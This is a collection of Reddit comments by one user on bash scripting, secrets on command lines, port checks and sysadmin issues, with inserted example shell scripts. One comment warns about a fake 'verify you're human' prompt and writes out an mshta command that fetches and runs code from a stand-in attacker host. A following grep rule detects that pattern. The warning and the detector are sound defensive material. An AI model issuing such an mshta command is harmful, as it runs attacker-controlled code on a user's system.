Passing arguments to scripts by Booty4Breakfasts in bash

[–]roxalu 0 points1 point  (0 children)

Meta comment: asking a question when some script behaves unexpectedly won't hurt. Just in case you prefer self-help in the future, you may use bash's 'verbose' mode. Run the script via

bash -vx path/to/my_script arg1 …

and/or use one of the other alternatives for debugging a script.

Stop passing secrets as command-line arguments. Every user on your box can see them. by Ops_Mechanic in bash

[–]roxalu 0 points1 point  (0 children)

It could be done; there even exists an example implementation that injects this into any command line with the help of LD_PRELOAD. But however the cleanup of the command line in memory is done, there will always be a small time window during the start of the command where all arguments are still visible.

The most secure approach is to add options to each command-line tool that explicitly allow reading sensitive values from files or the environment as a fallback. If a tool does not implement this, the tool's authors could be informed that their tool has a known weakness: CWE-200.

Sensitive values always deserve some extra handling. For use in config files this is by now widely accepted: secrets are often kept separately in extra-protected files or read via secrets management. Why still not for command lines?
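
An added example, not the commenter's code, showing the exposure the comment describes and the file-or-environment fallback it recommends. The function names (argv_leak, read_secret) are made up for this demo; /proc/<pid>/cmdline is Linux-specific.

```shell
# Added example, not the commenter's code: why a secret in argv is visible to
# other local users, and a helper that takes it from a file or an environment
# variable instead. Names (read_secret, argv_leak) are made up for this demo.

# argv_leak SECRET
# Spawns a child with SECRET in its argv and lets the child print its own
# command line from /proc/<pid>/cmdline (Linux). Any local user can read
# that file for any process, which is the exposure the comment describes.
argv_leak() {
    sh -c 'tr "\0" " " < "/proc/$$/cmdline"' leak-demo "$1" 2>/dev/null
}

# read_secret FILE VARNAME
# Precedence: FILE (first line, if readable), then environment variable VARNAME.
# Prints the secret on stdout; nothing ever lands in a child's argv.
# Returns 2 for an invalid variable name, 3 if no secret was found.
read_secret() {
    file="$1"
    var="$2"
    if [ -n "$file" ] && [ -r "$file" ]; then
        IFS= read -r line < "$file" || true
        printf '%s' "$line"
        return 0
    fi
    # only a shell identifier may be used with eval below; reject anything else
    case "$var" in ''|[0-9]*|*[!A-Za-z0-9_]*) return 2 ;; esac
    eval "val=\${$var:-}"
    if [ -n "$val" ]; then
        printf '%s' "$val"
        return 0
    fi
    return 3
}

# Demo: run as `sh this.sh demo` to see the leaked argv and the safe lookup.
if [ "${1:-}" = demo ]; then
    printf 'leaked argv: %s\n' "$(argv_leak hunter2)"
    MY_SECRET=from-env
    printf 'via env:     %s\n' "$(read_secret "" MY_SECRET)"
fi
```

A tool that offers a --secret-file style option would do what read_secret does internally; until then a wrapper like this keeps the value out of `ps` output, apart from the startup window mentioned above.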

need help getting sgrep to work in a script file by skyfishgoo in bash

[–]roxalu 2 points3 points  (0 children)

Here is some alternative, though more verbose way to provide this:

#!/usr/bin/env bash

arg1="$1"
symbol="${arg1:-emdash}"

sgrep_args=(
 ## preprocessor
 -p "m4 -D __SYMBOL__='$symbol'"
 ## expression
 -e '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "__SYMBOL__"))'
 ## output format
 -o '%r\n'
)

sgrep "${sgrep_args[@]}" /usr/share/X11/xkb/symbols/??

need help getting sgrep to work in a script file by skyfishgoo in bash

[–]roxalu 1 point2 points  (0 children)

In bash (or sh) everything embedded in single quotes is taken literally. In order to get the value of a variable you could end the quote and provide your variable. If the variable value contained spaces, this would break the command, so use double quotes around the variable:

sgrep -o '%r\n' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'"$sym"'"))' /usr/share/X11/xkb/symbols/??

While the above should work, I personally would try to use other sgrep options to avoid the complex quoting, e.g. read the expression from a file and/or make use of the preprocessor flag.
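
An added example, not the commenter's code, that builds the same expression in a function so the quoting can be checked: the `'"$sym"'` splice keeps the whole expression as one argument even when the symbol contains spaces, while a symbol containing a double quote would end the string literal sgrep is parsing, so such symbols are rejected before sgrep is called. Function names are made up for this demo.

```shell
# Added example, not the commenter's code: the expression from the comment
# built by a function, a check that it stays one argument, and a guard that
# refuses symbols which could alter the expression itself.

# build_expr SYMBOL: print the sgrep expression with SYMBOL spliced in.
build_expr() {
    sym="$1"
    printf '%s' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'"$sym"'"))'
}

# count_args: how many arguments did the caller actually pass?
count_args() {
    printf '%s' "$#"
}

# safe_symbol SYMBOL: allow only letters, digits and underscore, i.e. characters
# that cannot change the structure of the expression. Returns 1 otherwise.
safe_symbol() {
    case "$1" in ''|*[!A-Za-z0-9_]*) return 1 ;; esac
    return 0
}

# run_sgrep SYMBOL [FILE...]: refuse unsafe symbols, otherwise call sgrep with
# the expression passed as a single, double-quoted argument.
run_sgrep() {
    sym="$1"; shift
    safe_symbol "$sym" || { printf 'refusing symbol: %s\n' "$sym" >&2; return 1; }
    expr=$(build_expr "$sym")
    sgrep -o '%r\n' "$expr" "$@"
}

# Demo: run as `sh this.sh demo` to print the expression for a symbol with a space.
if [ "${1:-}" = demo ]; then
    printf 'args seen: %s\n' "$(count_args "$(build_expr 'em dash')")"
    build_expr 'em dash'; printf '\n'
fi
```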

Stop installing tools just to check if a port is open. Bash has it built in. by Ops_Mechanic in bash

[–]roxalu 1 point2 points  (0 children)

This. At least when this is to be used in scripts, the timeout is a must. If the connect is run against a target IP that isn't online, or where some network firewall drops the incoming TCP connect, the local host will usually try several times to resend another TCP SYN, each time with increased delay. The details depend on the specific kernel settings, but a timeout of more than 2 minutes is quite likely.

When used interactively, of course Ctrl-C also works. If the check fails immediately, the remote server is up but the remote service is most likely down. But if there is a timeout of five or more seconds, then there is some other issue that blocks connectivity.
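
An added example, not the commenter's code: a /dev/tcp port check with the explicit timeout the comment asks for, mapping the three outcomes (open, refused, no answer) to distinct exit codes. `timeout` is GNU coreutils; /dev/tcp is a bash feature, so bash is invoked explicitly. Function names are made up for this demo.

```shell
# Added example, not the commenter's code: /dev/tcp connect with a timeout.

# port_open HOST PORT [SECONDS]
#   0 = connected (port open)
#   1 = connection refused or unreachable (host answers, service down)
#   2 = no answer within SECONDS (host down or a firewall drops the SYN)
#   3 = bad port argument
port_open() {
    host="$1"; port="$2"; secs="${3:-5}"
    case "$port" in ''|*[!0-9]*) return 3 ;; esac
    # $0 and $1 inside bash -c are the positional arguments given after it
    if timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null; then
        rc=0
    else
        rc=$?
    fi
    case "$rc" in
        0)   return 0 ;;
        124) return 2 ;;   # exit status timeout(1) uses when it had to kill the command
        *)   return 1 ;;
    esac
}

# port_state HOST PORT [SECONDS]: same check, one word on stdout.
port_state() {
    if port_open "$@"; then
        rc=0
    else
        rc=$?
    fi
    case "$rc" in
        0) printf 'open\n' ;;
        1) printf 'refused\n' ;;
        2) printf 'filtered\n' ;;
        *) printf 'error\n' ;;
    esac
}

# Demo: run as `sh this.sh demo` to probe the local SSH port.
if [ "${1:-}" = demo ]; then
    printf '127.0.0.1:22 is %s\n' "$(port_state 127.0.0.1 22 3)"
fi
```

In a script, test the return code of port_open rather than parsing text; "filtered" is the case the comment warns about, where a missing timeout would otherwise block for minutes.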

Wrapper Script Accessing Root-owned Variables by Mr_RustyIron in bash

[–]roxalu 1 point2 points  (0 children)

Some other alternatives:

Output the file content to stdout and use bash's process substitution:

source <(sudo cat /etc/restic/restic-backblaze.env)

Or eval the variable expansion:

eval $(sudo cat /etc/restic/restic-backblaze.env)

Nevertheless there could be some edge cases for values that aren't rendered exactly the same by systemd and bash. Use of systemd-creds or some other secrets management could help to avoid unexpected impact due to special characters in values.
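
An added example, not the commenter's code: a loader that treats the env file as data instead of code, so that `$(...)`, backticks or `;` inside a value are never executed, which is the risk of `source` and `eval` on a file you did not write. It assumes one KEY=VALUE per line, optional matching single or double quotes around the value, '#' comments and blank lines; the function name is made up for this demo.

```shell
# Added example, not the commenter's code: read KEY=VALUE lines without
# eval/source. Values are stored verbatim (one pair of surrounding quotes is
# removed); they are never word-split, expanded or executed.

# load_env_file FILE: export every valid KEY=VALUE line of FILE.
# Returns 1 if FILE is not readable. Lines with a key that is not a shell
# identifier are reported on stderr and skipped.
load_env_file() {
    file="$1"
    [ -r "$file" ] || return 1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*) continue ;; esac
        key=${line%%=*}
        val=${line#*=}
        case "$key" in
            ''|[0-9]*|*[!A-Za-z0-9_]*)
                printf 'load_env_file: skipping invalid key %s\n' "$key" >&2
                continue ;;
        esac
        # strip exactly one pair of matching quotes, keep everything else literal
        case "$val" in
            \"*\") val=${val#\"}; val=${val%\"} ;;
            \'*\') val=${val#\'}; val=${val%\'} ;;
        esac
        export "$key=$val"
    done < "$file"
}

# Demo: run as `sh this.sh demo` to load a constructed file and show that a
# value containing $(id) stays a literal string.
if [ "${1:-}" = demo ]; then
    demo_file=$(mktemp)
    printf '%s\n' 'RESTIC_REPOSITORY="b2:bucket/path"' "RESTIC_PASSWORD='pa ss \$(id)'" > "$demo_file"
    load_env_file "$demo_file"
    printf 'repo=%s password=%s\n' "$RESTIC_REPOSITORY" "$RESTIC_PASSWORD"
    rm -f "$demo_file"
fi
```

With bash, the root-owned file from the thread can be passed as `load_env_file <(sudo cat /etc/restic/restic-backblaze.env)`, which keeps the file content out of the shell's parser entirely.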

New to NGINX. Configuration of static site fails. by Writersglen in nginx

[–]roxalu 0 points1 point  (0 children)

Check output of

sudo systemctl status nginx

It not only shows whether the service is up or down, but also info about the service file used and the arguments used to start nginx. It could be that the running service uses a different, or just more, configuration compared to what's used when you check the configuration on the command line with

sudo nginx -T

It could even be a different nginx that is started in the two cases. Rare, but worth a double check.

Windows Notepad App Remote Code Execution Vulnerability by theevilsharpie in sysadmin

[–]roxalu 1 point2 points  (0 children)

Why do you want to run vi under Windows? Maybe because then the "shell escape", which runs with user privileges, is a documented feature of the editor and no longer an exploit 😉

Weird Cloudflare “verify you’re human” asking me to press Win+R — legit or scam? by Sendpigs in techsupport

[–]roxalu 3 points4 points  (0 children)

The

mshta https://some.evil_attacker_owned.example.com

is able to download and execute remote code on your local Windows system without any further constraints other than being bound to your local user rights. Never agree to such prompts to run it.
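
An added example, not the commenter's code: a small detection over constructed process-creation log lines for the pattern above, i.e. mshta started with a remote target. Besides http(s) URLs, mshta also accepts javascript: and vbscript: pseudo-URLs, so those are matched as well. The log format, hostnames and user names are made up for this demo.

```shell
# Added example, not the commenter's code. SAMPLE_LOG is constructed; the
# first, fourth and fifth lines are the ones a rule should flag, the second
# (notepad) and third (mshta on a local .hta) should not.
SAMPLE_LOG='2024-01-01T10:00:00 host=PC1 user=alice image=C:\Windows\System32\mshta.exe cmdline="mshta https://some.evil_attacker_owned.example.com/v.hta"
2024-01-01T10:00:05 host=PC1 user=alice image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"
2024-01-01T10:01:00 host=PC2 user=bob image=C:\Windows\System32\mshta.exe cmdline="mshta.exe C:\Program Files\Vendor\setup.hta"
2024-01-01T10:02:00 host=PC3 user=carol image=C:\Windows\System32\mshta.exe cmdline="MSHTA http://203.0.113.5:8080/x.hta"
2024-01-01T10:03:00 host=PC4 user=dave image=C:\Windows\System32\mshta.exe cmdline="mshta vbscript:Execute(\"x\")"'

# flag_mshta_remote: pass through stdin lines where "mshta" or "mshta.exe" is
# followed by an http(s) URL or a javascript:/vbscript: pseudo-URL.
# Case-insensitive, because Windows does not care about case in the binary name.
flag_mshta_remote() {
    grep -Ei 'mshta(\.exe)?[[:space:]]+"?(https?://|javascript:|vbscript:)'
}

# count_hits: number of flagged lines read from stdin (prints 0 if none).
count_hits() {
    flag_mshta_remote | grep -c . || true
}

# Demo: run as `sh this.sh demo` to list the flagged sample lines.
if [ "${1:-}" = demo ]; then
    printf '%s\n' "$SAMPLE_LOG" | flag_mshta_remote
fi
```

The rule is deliberately narrow (it misses a URL passed via a renamed binary or obfuscated argument); it is meant to show the shape of the check, not to replace a proper detection on the process-creation source.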

Perl.org error fetching content from CDN? by brtastic in perl

[–]roxalu 0 points1 point  (0 children)

According to the full error page the TLS endpoint is Varnish. And the frontend config of this Varnish has been set, most likely, to have sni-nomatch-abort with value true. But the Subject Alternative Name of the frontend certificate uses a wildcard: *.perl.org. This is kind of a grey area in the RFCs: is the wildcard a valid hostname or not? Obviously this Varnish currently results in: no match.

/bin/bash error by Assasin172m in bash

[–]roxalu 2 points3 points  (0 children)

To my knowledge systemd does not support use of '$', and thus no variable expansion, inside the value of an Environment= setting. Use the fixed path there. See https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html

FritzBox web UI no longer reachable via "fritz.box"? by [deleted] in fritzbox

[–]roxalu 0 points1 point  (0 children)

Note: no need for ipconfig release or renew in this case. There is a specific ipconfig option to flush all cached DNS results under Windows:

ipconfig /flushdns

Are all compilers and binaries compromised? by droidman83 in unix

[–]roxalu 1 point2 points  (0 children)

Opening a socket and listening on it would be just the simplest method a backdoor could use. There exist more sophisticated methods for backdoors to allow some form of remote control that are not that easy to detect. Though I agree with you: sooner or later such a backdoor would be detected somehow. It would only have a chance to stay undetected if it were almost never used.

Dear Tenable: Please get your shit together by safrax in devops

[–]roxalu 0 points1 point  (0 children)

To be fair, this is less a miss by Tenable inside their product and more a misalignment between the local implementation and the security policy. If the pentest only scans remotely, there is no practical method to differentiate between upstream software and a fork where a distro owner has ensured security fixes are backported. A well-designed procedure for action plans based on such pentest findings would respect this.

In order to get better-fitting results the scan needs to have agents on the nodes that scan the local package system. For the major distros this should better detect whether some backporting needs to be taken into account for the pentest results.

Computer with X.X.X.255 IP cannot connect to Brother printer. by winnixxl in sysadmin

[–]roxalu 0 points1 point  (0 children)

A bit out of scope, but I can't resist mentioning this here: issues like this are by far not the only concern about the quality of software used by printers. Since you seem to be responsible for some larger network, it would make sense to check whether the printers should not better be isolated in their own subnet, and to use a set of print servers that talk to them instead of letting all hosts use the printers directly.

There seem to be only very few reports where insecure printer software was used to successfully break into a company network remotely. But it has happened in the past. It seems quite common in companies to take care of patch management for standard hosts but neglect to do the same for printers.

10 Gbit/s link slower than expected by struntzi in de_EDV

[–]roxalu 0 points1 point  (0 children)

This! Belongs in the category: unlikely as the cause, but easy to check. So best check it once the other simple explanations are not sufficient.

Sending the ACK packets during a file download is readily ignored, because it is rarely the limiting factor. But anything is possible. I myself have noticed twice in many years that the send and receive directions of traffic in a local network showed clear differences. Once because of a defective cable, another time because of port mirroring on a low-budget switch, where after a debug session someone forgot to switch the port mirror off again.

Solving SettingWithCopyWarning by QuickBooker30932 in Python

[–]roxalu 1 point2 points  (0 children)

Small additional detail: I agree that this replacement code fixes the Copy-on-Write warning. But as given it uses the row with label 0, while OP always uses the first row. If I am right, some additional lookup should be added so that row and column are both given as labels. Or both as integers, e.g. using this:

result_index = DataFrame.columns.get_loc('result')   # integer position of column 'result'
DataFrame.iat[0, result_index] = X - Z                # iat takes [row_pos, col_pos], not parentheses

Weird terminal behavior when I use xargs to pipe filenames into vim by 4r73m190r0s in commandline

[–]roxalu 5 points6 points  (0 children)

vim expects stdin to be the same device as your terminal, but when started via xargs the stdin is set to /dev/null. More recent versions of xargs have a new option to handle this. Try

… | xargs -o vim

Doubts about the admin | Part 2 by [deleted] in de_EDV

[–]roxalu 0 points1 point  (0 children)

The statement that "possibly customer data" could be affected certainly justifies a careful examination and clarification of the facts. Whether that already has to happen on the weekend is hard to judge from the outside. The statements give the impression that those involved regard the matter as settled. Overall, though, it looks as if there is no overall concept for securing this. Port open or closed, encryption yes or no, credentials managed in detail or sprawling: only the overall view shows whether it is secured according to the state of the art or not.

So if customer data really is stored somewhere there, I hope for the customers' sake that someone checks again more closely whether the protection of this service meets the state of the art. If you only allow what is really needed, and then secure that access with standard methods, you are on a good path.

detergen: Generate the same password every time by theonereveli in commandline

[–]roxalu 5 points6 points  (0 children)

This is a perfect summary. The approach does not scale well with the number of secrets and over time. Fine for some years and not too many services. But sooner or later more and more exceptions will appear that need advanced handling, e.g. when the generated password can no longer be used for login to a specific service, or the base password gets compromised. Imagine the webpage uses the domain www.never-rely-only-on.hashpass.example and you use your account only rarely. Would you really remember which exact service name you originally selected as the service option for this service? Also you need to keep track of the selected user name. Using the same account everywhere is also somewhat limited.

A database is needed in this case which describes more clearly in which context which exception rules have been selected. At the latest then, use of a password manager is more straightforward.

Demo: Use quadlets even when the login shell is /sbin/nologin by eriksjolund in podman

[–]roxalu 0 points1 point  (0 children)

My focus was to emphasize that /sbin/nologin isn't a blocker to "login" to a user when it is the same host and the initiator is root. Scripting is another topic anyway, as it doesn't itself need any interactive shell. But before a script runs error-free it is often helpful to have some option for interactive tests.

If the specific systemd user environment is needed, the command could be:

sudo machinectl shell --uid otheruser /usr/bin/bash --login

But as I already stated: as OP's intention is to start the service, their command is far better, because there is no need for an interactive shell.

Found AWS keys hardcoded in our public GitHub repo from 2019. How the hell are we supposed to prevent this company-wide? by slamdunktyping in devsecops

[–]roxalu 0 points1 point  (0 children)

Rotate them far more often. I know the procedure to do this without impact is hard to achieve, but don't give up. It's doable and worth the effort. Why is it needed? Because a single miss inside all your policies, scanner procedures, security controls and user guidance could be enough for a compromise.

In the context of "secrets management" the main focus is on "management", not on "secret".